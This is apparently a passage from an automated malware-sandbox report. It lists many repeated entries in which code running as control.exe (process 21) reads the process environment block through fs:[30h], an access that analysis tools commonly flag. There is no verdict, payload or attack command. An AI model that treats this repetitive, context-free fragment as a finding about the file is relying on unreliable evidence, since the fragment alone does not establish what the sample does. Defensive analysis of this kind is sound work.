Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460AE73 mov eax, dword ptr fs:[00000030h]	21_2_0460AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460AE73 mov eax, dword ptr fs:[00000030h]	21_2_0460AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460AE73 mov eax, dword ptr fs:[00000030h]	21_2_0460AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460AE73 mov eax, dword ptr fs:[00000030h]	21_2_0460AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460AE73 mov eax, dword ptr fs:[00000030h]	21_2_0460AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F7E41 mov eax, dword ptr fs:[00000030h]	21_2_045F7E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F7E41 mov eax, dword ptr fs:[00000030h]	21_2_045F7E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F7E41 mov eax, dword ptr fs:[00000030h]	21_2_045F7E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F7E41 mov eax, dword ptr fs:[00000030h]	21_2_045F7E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F7E41 mov eax, dword ptr fs:[00000030h]	21_2_045F7E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F7E41 mov eax, dword ptr fs:[00000030h]	21_2_045F7E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046AAE44 mov eax, dword ptr fs:[00000030h]	21_2_046AAE44
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046AAE44 mov eax, dword ptr fs:[00000030h]	21_2_046AAE44
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F766D mov eax, dword ptr fs:[00000030h]	21_2_045F766D
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0469FE3F mov eax, dword ptr fs:[00000030h]	21_2_0469FE3F
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045EC600 mov eax, dword ptr fs:[00000030h]	21_2_045EC600
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045EC600 mov eax, dword ptr fs:[00000030h]	21_2_045EC600
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045EC600 mov eax, dword ptr fs:[00000030h]	21_2_045EC600
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04618E00 mov eax, dword ptr fs:[00000030h]	21_2_04618E00
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046A1608 mov eax, dword ptr fs:[00000030h]	21_2_046A1608
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461A61C mov eax, dword ptr fs:[00000030h]	21_2_0461A61C
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461A61C mov eax, dword ptr fs:[00000030h]	21_2_0461A61C
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045EE620 mov eax, dword ptr fs:[00000030h]	21_2_045EE620
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046116E0 mov ecx, dword ptr fs:[00000030h]	21_2_046116E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04628EC7 mov eax, dword ptr fs:[00000030h]	21_2_04628EC7
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0469FEC0 mov eax, dword ptr fs:[00000030h]	21_2_0469FEC0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046136CC mov eax, dword ptr fs:[00000030h]	21_2_046136CC
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F76E2 mov eax, dword ptr fs:[00000030h]	21_2_045F76E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B8ED6 mov eax, dword ptr fs:[00000030h]	21_2_046B8ED6
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046646A7 mov eax, dword ptr fs:[00000030h]	21_2_046646A7
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B0EA5 mov eax, dword ptr fs:[00000030h]	21_2_046B0EA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B0EA5 mov eax, dword ptr fs:[00000030h]	21_2_046B0EA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B0EA5 mov eax, dword ptr fs:[00000030h]	21_2_046B0EA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0467FE87 mov eax, dword ptr fs:[00000030h]	21_2_0467FE87
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B8F6A mov eax, dword ptr fs:[00000030h]	21_2_046B8F6A
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045FEF40 mov eax, dword ptr fs:[00000030h]	21_2_045FEF40
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045FFF60 mov eax, dword ptr fs:[00000030h]	21_2_045FFF60
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461E730 mov eax, dword ptr fs:[00000030h]	21_2_0461E730
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460B73D mov eax, dword ptr fs:[00000030h]	21_2_0460B73D
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460B73D mov eax, dword ptr fs:[00000030h]	21_2_0460B73D
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B070D mov eax, dword ptr fs:[00000030h]	21_2_046B070D
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B070D mov eax, dword ptr fs:[00000030h]	21_2_046B070D
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461A70E mov eax, dword ptr fs:[00000030h]	21_2_0461A70E
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461A70E mov eax, dword ptr fs:[00000030h]	21_2_0461A70E
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E4F2E mov eax, dword ptr fs:[00000030h]	21_2_045E4F2E
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E4F2E mov eax, dword ptr fs:[00000030h]	21_2_045E4F2E
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460F716 mov eax, dword ptr fs:[00000030h]	21_2_0460F716
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0467FF10 mov eax, dword ptr fs:[00000030h]	21_2_0467FF10
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0467FF10 mov eax, dword ptr fs:[00000030h]	21_2_0467FF10
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046237F5 mov eax, dword ptr fs:[00000030h]	21_2_046237F5
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F8794 mov eax, dword ptr fs:[00000030h]	21_2_045F8794
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04667794 mov eax, dword ptr fs:[00000030h]	21_2_04667794
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04667794 mov eax, dword ptr fs:[00000030h]	21_2_04667794
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04667794 mov eax, dword ptr fs:[00000030h]	21_2_04667794
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046A2073 mov eax, dword ptr fs:[00000030h]	21_2_046A2073
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B1074 mov eax, dword ptr fs:[00000030h]	21_2_046B1074
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04600050 mov eax, dword ptr fs:[00000030h]	21_2_04600050
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04600050 mov eax, dword ptr fs:[00000030h]	21_2_04600050
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461002D mov eax, dword ptr fs:[00000030h]	21_2_0461002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461002D mov eax, dword ptr fs:[00000030h]	21_2_0461002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461002D mov eax, dword ptr fs:[00000030h]	21_2_0461002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461002D mov eax, dword ptr fs:[00000030h]	21_2_0461002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461002D mov eax, dword ptr fs:[00000030h]	21_2_0461002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A830 mov eax, dword ptr fs:[00000030h]	21_2_0460A830
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A830 mov eax, dword ptr fs:[00000030h]	21_2_0460A830
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A830 mov eax, dword ptr fs:[00000030h]	21_2_0460A830
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A830 mov eax, dword ptr fs:[00000030h]	21_2_0460A830
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04667016 mov eax, dword ptr fs:[00000030h]	21_2_04667016
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04667016 mov eax, dword ptr fs:[00000030h]	21_2_04667016
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04667016 mov eax, dword ptr fs:[00000030h]	21_2_04667016
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045FB02A mov eax, dword ptr fs:[00000030h]	21_2_045FB02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045FB02A mov eax, dword ptr fs:[00000030h]	21_2_045FB02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045FB02A mov eax, dword ptr fs:[00000030h]	21_2_045FB02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045FB02A mov eax, dword ptr fs:[00000030h]	21_2_045FB02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B4015 mov eax, dword ptr fs:[00000030h]	21_2_046B4015
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B4015 mov eax, dword ptr fs:[00000030h]	21_2_046B4015
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460B8E4 mov eax, dword ptr fs:[00000030h]	21_2_0460B8E4
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460B8E4 mov eax, dword ptr fs:[00000030h]	21_2_0460B8E4
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E58EC mov eax, dword ptr fs:[00000030h]	21_2_045E58EC
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0467B8D0 mov eax, dword ptr fs:[00000030h]	21_2_0467B8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0467B8D0 mov ecx, dword ptr fs:[00000030h]	21_2_0467B8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0467B8D0 mov eax, dword ptr fs:[00000030h]	21_2_0467B8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0467B8D0 mov eax, dword ptr fs:[00000030h]	21_2_0467B8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0467B8D0 mov eax, dword ptr fs:[00000030h]	21_2_0467B8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0467B8D0 mov eax, dword ptr fs:[00000030h]	21_2_0467B8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E40E1 mov eax, dword ptr fs:[00000030h]	21_2_045E40E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E40E1 mov eax, dword ptr fs:[00000030h]	21_2_045E40E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E40E1 mov eax, dword ptr fs:[00000030h]	21_2_045E40E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046120A0 mov eax, dword ptr fs:[00000030h]	21_2_046120A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046120A0 mov eax, dword ptr fs:[00000030h]	21_2_046120A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046120A0 mov eax, dword ptr fs:[00000030h]	21_2_046120A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046120A0 mov eax, dword ptr fs:[00000030h]	21_2_046120A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046120A0 mov eax, dword ptr fs:[00000030h]	21_2_046120A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046120A0 mov eax, dword ptr fs:[00000030h]	21_2_046120A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046290AF mov eax, dword ptr fs:[00000030h]	21_2_046290AF
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E9080 mov eax, dword ptr fs:[00000030h]	21_2_045E9080
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461F0BF mov ecx, dword ptr fs:[00000030h]	21_2_0461F0BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461F0BF mov eax, dword ptr fs:[00000030h]	21_2_0461F0BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461F0BF mov eax, dword ptr fs:[00000030h]	21_2_0461F0BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04663884 mov eax, dword ptr fs:[00000030h]	21_2_04663884
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04663884 mov eax, dword ptr fs:[00000030h]	21_2_04663884
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460B944 mov eax, dword ptr fs:[00000030h]	21_2_0460B944
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460B944 mov eax, dword ptr fs:[00000030h]	21_2_0460B944
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045EB171 mov eax, dword ptr fs:[00000030h]	21_2_045EB171
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045EB171 mov eax, dword ptr fs:[00000030h]	21_2_045EB171
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045EC962 mov eax, dword ptr fs:[00000030h]	21_2_045EC962
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04604120 mov eax, dword ptr fs:[00000030h]	21_2_04604120
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04604120 mov eax, dword ptr fs:[00000030h]	21_2_04604120
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04604120 mov eax, dword ptr fs:[00000030h]	21_2_04604120
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04604120 mov eax, dword ptr fs:[00000030h]	21_2_04604120
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04604120 mov ecx, dword ptr fs:[00000030h]	21_2_04604120
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461513A mov eax, dword ptr fs:[00000030h]	21_2_0461513A
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461513A mov eax, dword ptr fs:[00000030h]	21_2_0461513A
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E9100 mov eax, dword ptr fs:[00000030h]	21_2_045E9100
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E9100 mov eax, dword ptr fs:[00000030h]	21_2_045E9100
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E9100 mov eax, dword ptr fs:[00000030h]	21_2_045E9100
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046741E8 mov eax, dword ptr fs:[00000030h]	21_2_046741E8
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045EB1E1 mov eax, dword ptr fs:[00000030h]	21_2_045EB1E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045EB1E1 mov eax, dword ptr fs:[00000030h]	21_2_045EB1E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045EB1E1 mov eax, dword ptr fs:[00000030h]	21_2_045EB1E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046669A6 mov eax, dword ptr fs:[00000030h]	21_2_046669A6
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046161A0 mov eax, dword ptr fs:[00000030h]	21_2_046161A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046161A0 mov eax, dword ptr fs:[00000030h]	21_2_046161A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046A49A4 mov eax, dword ptr fs:[00000030h]	21_2_046A49A4
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046A49A4 mov eax, dword ptr fs:[00000030h]	21_2_046A49A4
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046A49A4 mov eax, dword ptr fs:[00000030h]	21_2_046A49A4
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046A49A4 mov eax, dword ptr fs:[00000030h]	21_2_046A49A4
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046651BE mov eax, dword ptr fs:[00000030h]	21_2_046651BE
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046651BE mov eax, dword ptr fs:[00000030h]	21_2_046651BE
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046651BE mov eax, dword ptr fs:[00000030h]	21_2_046651BE
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046651BE mov eax, dword ptr fs:[00000030h]	21_2_046651BE
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046099BF mov ecx, dword ptr fs:[00000030h]	21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046099BF mov ecx, dword ptr fs:[00000030h]	21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046099BF mov eax, dword ptr fs:[00000030h]	21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046099BF mov ecx, dword ptr fs:[00000030h]	21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046099BF mov ecx, dword ptr fs:[00000030h]	21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046099BF mov eax, dword ptr fs:[00000030h]	21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046099BF mov ecx, dword ptr fs:[00000030h]	21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046099BF mov ecx, dword ptr fs:[00000030h]	21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046099BF mov eax, dword ptr fs:[00000030h]	21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046099BF mov ecx, dword ptr fs:[00000030h]	21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046099BF mov ecx, dword ptr fs:[00000030h]	21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046099BF mov eax, dword ptr fs:[00000030h]	21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460C182 mov eax, dword ptr fs:[00000030h]	21_2_0460C182
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461A185 mov eax, dword ptr fs:[00000030h]	21_2_0461A185
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04612990 mov eax, dword ptr fs:[00000030h]	21_2_04612990
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0469B260 mov eax, dword ptr fs:[00000030h]	21_2_0469B260
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0469B260 mov eax, dword ptr fs:[00000030h]	21_2_0469B260
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B8A62 mov eax, dword ptr fs:[00000030h]	21_2_046B8A62
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0462927A mov eax, dword ptr fs:[00000030h]	21_2_0462927A
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E9240 mov eax, dword ptr fs:[00000030h]	21_2_045E9240
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E9240 mov eax, dword ptr fs:[00000030h]	21_2_045E9240
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E9240 mov eax, dword ptr fs:[00000030h]	21_2_045E9240
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E9240 mov eax, dword ptr fs:[00000030h]	21_2_045E9240
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04674257 mov eax, dword ptr fs:[00000030h]	21_2_04674257
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046AEA55 mov eax, dword ptr fs:[00000030h]	21_2_046AEA55
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045EAA16 mov eax, dword ptr fs:[00000030h]	21_2_045EAA16
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045EAA16 mov eax, dword ptr fs:[00000030h]	21_2_045EAA16
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h]	21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h]	21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h]	21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h]	21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h]	21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h]	21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h]	21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h]	21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h]	21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04624A2C mov eax, dword ptr fs:[00000030h]	21_2_04624A2C
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04624A2C mov eax, dword ptr fs:[00000030h]	21_2_04624A2C
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E5210 mov eax, dword ptr fs:[00000030h]	21_2_045E5210
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E5210 mov ecx, dword ptr fs:[00000030h]	21_2_045E5210
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E5210 mov eax, dword ptr fs:[00000030h]	21_2_045E5210
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E5210 mov eax, dword ptr fs:[00000030h]	21_2_045E5210
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F8A0A mov eax, dword ptr fs:[00000030h]	21_2_045F8A0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04603A1C mov eax, dword ptr fs:[00000030h]	21_2_04603A1C
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046AAA16 mov eax, dword ptr fs:[00000030h]	21_2_046AAA16
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046AAA16 mov eax, dword ptr fs:[00000030h]	21_2_046AAA16
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04612AE4 mov eax, dword ptr fs:[00000030h]	21_2_04612AE4
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04612ACB mov eax, dword ptr fs:[00000030h]	21_2_04612ACB
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461FAB0 mov eax, dword ptr fs:[00000030h]	21_2_0461FAB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045FAAB0 mov eax, dword ptr fs:[00000030h]	21_2_045FAAB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045FAAB0 mov eax, dword ptr fs:[00000030h]	21_2_045FAAB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461D294 mov eax, dword ptr fs:[00000030h]	21_2_0461D294
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461D294 mov eax, dword ptr fs:[00000030h]	21_2_0461D294
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E52A5 mov eax, dword ptr fs:[00000030h]	21_2_045E52A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E52A5 mov eax, dword ptr fs:[00000030h]	21_2_045E52A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E52A5 mov eax, dword ptr fs:[00000030h]	21_2_045E52A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E52A5 mov eax, dword ptr fs:[00000030h]	21_2_045E52A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E52A5 mov eax, dword ptr fs:[00000030h]	21_2_045E52A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045EF358 mov eax, dword ptr fs:[00000030h]	21_2_045EF358
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04613B7A mov eax, dword ptr fs:[00000030h]	21_2_04613B7A
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04613B7A mov eax, dword ptr fs:[00000030h]	21_2_04613B7A
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045EDB40 mov eax, dword ptr fs:[00000030h]	21_2_045EDB40
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B8B58 mov eax, dword ptr fs:[00000030h]	21_2_046B8B58
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045EDB60 mov ecx, dword ptr fs:[00000030h]	21_2_045EDB60
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]	21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]	21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]	21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]	21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]	21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]	21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]	21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]	21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]	21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]	21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]	21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]	21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]	21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]	21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]	21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]	21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]	21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]	21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]	21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]	21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h]	21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046A131B mov eax, dword ptr fs:[00000030h]	21_2_046A131B
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046103E2 mov eax, dword ptr fs:[00000030h]	21_2_046103E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046103E2 mov eax, dword ptr fs:[00000030h]	21_2_046103E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046103E2 mov eax, dword ptr fs:[00000030h]	21_2_046103E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046103E2 mov eax, dword ptr fs:[00000030h]	21_2_046103E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046103E2 mov eax, dword ptr fs:[00000030h]	21_2_046103E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046103E2 mov eax, dword ptr fs:[00000030h]	21_2_046103E2
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460DBE9 mov eax, dword ptr fs:[00000030h]	21_2_0460DBE9
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046653CA mov eax, dword ptr fs:[00000030h]	21_2_046653CA
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046653CA mov eax, dword ptr fs:[00000030h]	21_2_046653CA
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04614BAD mov eax, dword ptr fs:[00000030h]	21_2_04614BAD
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04614BAD mov eax, dword ptr fs:[00000030h]	21_2_04614BAD
